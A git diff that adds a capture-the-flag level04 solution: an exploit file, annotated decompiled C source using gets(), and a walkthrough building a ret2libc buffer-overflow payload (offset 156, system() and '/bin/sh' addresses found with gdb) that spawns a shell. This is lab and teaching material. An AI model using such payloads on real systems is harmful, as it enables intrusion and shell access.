diff --git a/level04/ressources/exploit b/level04/ressources/exploit new file mode 100644 index 0000000..80767a8 --- /dev/null +++ b/level04/ressources/exploit @@ -0,0 +1 @@ +(python -c 'print "A" * 156 + "\xd0\xae\xe6\xf7" + "A" * 4 + "\xec\x97\xf8\xf7"'; cat) | ./level04 diff --git a/level04/source.c b/level04/source.c index c27b7f1..ca1204a 100644 --- a/level04/source.c +++ b/level04/source.c @@ -13,7 +13,7 @@ int main(void) pid = fork(); memset(s, 0, sizeof(s)); - if (pid) { + if (pid) { // parent code do { wait(&wstatus); if (WIFSIGNALED(wstatus) || @@ -23,10 +23,10 @@ int main(void) } } while (ptrace(PTRACE_PEEKUSER, pid, 44, 0) != 11); puts("no exec() for you"); - kill(pid, 9); - } else { - prctl(1, 1); - ptrace(PTRACE_TRACEME, 0, 0, 0); + kill(pid, SIGKILL); + } else { // child code + prctl(1, PR_SET_PDEATHSIG); + ptrace(PTRACE_TRACEME, 0, NULL, NULL); puts("Give me some shellcode, k"); gets(s); } diff --git a/level04/walkthrough b/level04/walkthrough new file mode 100644 index 0000000..64e476b --- /dev/null +++ b/level04/walkthrough @@ -0,0 +1,51 @@ +# Level04 + +Using hexrays, we can decompile the code and see that it does a `fork()` of the main process. +The child process will call `gets()` which is a deprecated and unsafe function, vulnerable to buffer overflows. +We can exploit this vulnerability to overflow `eip` and call `system()` function (the code has ASLR disabled so we can hardcode its address in our exploit). +First, we need to find the offset between our buffer and `eip`. To achieve this, we're going to use gdb `set follow-fork-mode child` and (this EIP offset tool)[https://wiremask.eu/tools/buffer-overflow-pattern-generator/]. We get an offset of 156. +Then we're going to overwrite the next 4 bytes (used for the return address of `system()`, which will be unused here so we don't care about its value). Finally we can write the address of our argument `"/bin/sh"` on the stack so that `system("/bin/sh")` executes. +To find all these addresses, we're going to use gdb. +Address of `system()`: +``` +(gdb) p system +$1 = {} 0xf7e6aed0 +``` +So its address is `0xf7e6aed0`. + +Address of `"/bin/sh"`: +``` +(gdb) info proc map +process 2205 +Mapped address spaces: + + Start Addr End Addr Size Offset objfile + 0x8048000 0x8049000 0x1000 0x0 /home/users/level04/level04 + 0x8049000 0x804a000 0x1000 0x0 /home/users/level04/level04 + 0x804a000 0x804b000 0x1000 0x1000 /home/users/level04/level04 + 0xf7e2b000 0xf7e2c000 0x1000 0x0 + 0xf7e2c000 0xf7fcc000 0x1a0000 0x0 /lib32/libc-2.15.so + 0xf7fcc000 0xf7fcd000 0x1000 0x1a0000 /lib32/libc-2.15.so + 0xf7fcd000 0xf7fcf000 0x2000 0x1a0000 /lib32/libc-2.15.so + 0xf7fcf000 0xf7fd0000 0x1000 0x1a2000 /lib32/libc-2.15.so + 0xf7fd0000 0xf7fd4000 0x4000 0x0 + 0xf7fda000 0xf7fdb000 0x1000 0x0 + 0xf7fdb000 0xf7fdc000 0x1000 0x0 [vdso] + 0xf7fdc000 0xf7ffc000 0x20000 0x0 /lib32/ld-2.15.so + 0xf7ffc000 0xf7ffd000 0x1000 0x1f000 /lib32/ld-2.15.so + 0xf7ffd000 0xf7ffe000 0x1000 0x20000 /lib32/ld-2.15.so + 0xfffdd000 0xffffe000 0x21000 0x0 [stack] +(gdb) find 0xf7e2c000,0xf7fd0000,"/bin/sh" +0xf7f897ec +1 pattern found. +``` +So its address is `0xf7f897ec`. + +We can now build the exploit in 4 parts: +- `"A"*156` => the offset to overflow the buffer until `eip` +- `"\xd0\xae\xe6\xf7"` => `system()`'s address +- `"A"*4` => the return address of `system()` (useless value but the offset is needed for the exploit) +- `"\xec\x97\xf8\xf7"` => `"/bin/sh"`'s address. + +Here is the full command: +`(python -c 'print "A" * 156 + "\xd0\xae\xe6\xf7" + "A" * 4 + "\xec\x97\xf8\xf7"'; cat) | ./level04`